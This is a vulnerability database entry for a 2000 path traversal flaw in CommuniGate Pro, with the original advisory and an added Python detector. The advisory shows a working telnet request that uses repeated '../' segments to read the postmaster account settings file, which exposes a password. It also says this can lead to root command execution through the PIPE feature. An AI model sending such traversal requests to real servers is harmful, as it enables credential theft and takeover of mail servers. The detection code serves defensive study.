Vendor: CommuniGate Pro
By: SecurityFocus
CVSS: 7.5 HIGH
Arbitrary File Access
CWE: 22
Product Name: CommuniGate Pro
Affected Version From: 3.2.2004
Affected Version To: 3.2.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:stalker:communigate_pro
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2000

CommuniGate Pro Arbitrary File Access Vulnerability

It is possible to exploit this vulnerability to read arbitrary files on the filesystem. As CommuniGate Pro runs as root, any file can be accessed. Using this flaw, it is possible to gain enough privilege to remotely execute commands as root.

Mitigation:

Restrict access to the vulnerable system and ensure that all software is up to date.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/1493/info

A vulnerability exists in the CommuniGate Pro product, from Stalker. It is possible to exploit this vulnerability to read arbitrary files on the filesystem. As CommuniGate Pro runs as root, any file can be accessed. Using this flaw, it is possible to gain enough privilege to remotely execute commands as root. 

Retrieve the postmaster/manager configuration file:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0

HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT

{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.
homer:~$

Using this information, it is possible to alter the configuration on the mail server to allow execution using its PIPE feature.
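
The request above leaves the /Guide/ directory through repeated ../ segments. As an added example (not part of the original advisory and not CommuniGate Pro code), the Python below flags such request lines in a log by decoding the target and tracking directory depth; it goes beyond the advisory's literal case by also handling percent-encoded and backslash forms. Only the first sample line comes from the advisory; the others are constructed.

```python
from urllib.parse import unquote


def decode_path(target, max_rounds=3):
    """Return the path part of a request target, percent-decoded until stable."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    for _ in range(max_rounds):  # repeat to undo double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")  # treat backslash as a separator too


def escapes_root(target):
    """True if resolving the path would climb above the server's document root."""
    depth = 0
    for segment in decode_path(target).split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:  # one more ".." than directories entered
                return True
        else:
            depth += 1
    return False


def flag_requests(request_lines):
    """Return the targets of all request lines that escape the root."""
    flagged = []
    for line in request_lines:
        parts = line.split()
        if len(parts) >= 2 and escapes_root(parts[1]):
            flagged.append(parts[1])
    return flagged


# First line is the advisory's request; the rest are constructed samples.
SAMPLE_LINES = [
    "GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0",
    "GET /Guide/Intro.html HTTP/1.0",
    "GET /Guide/images/../Intro.html HTTP/1.0",
    "GET /Guide/%2e%2e/%2e%2e/x HTTP/1.0",
]

if __name__ == "__main__":
    for target in flag_requests(SAMPLE_LINES):
        print("traversal attempt:", target)
```

The same depth check can be applied server-side before a file is opened, rejecting any request for which escapes_root() is true.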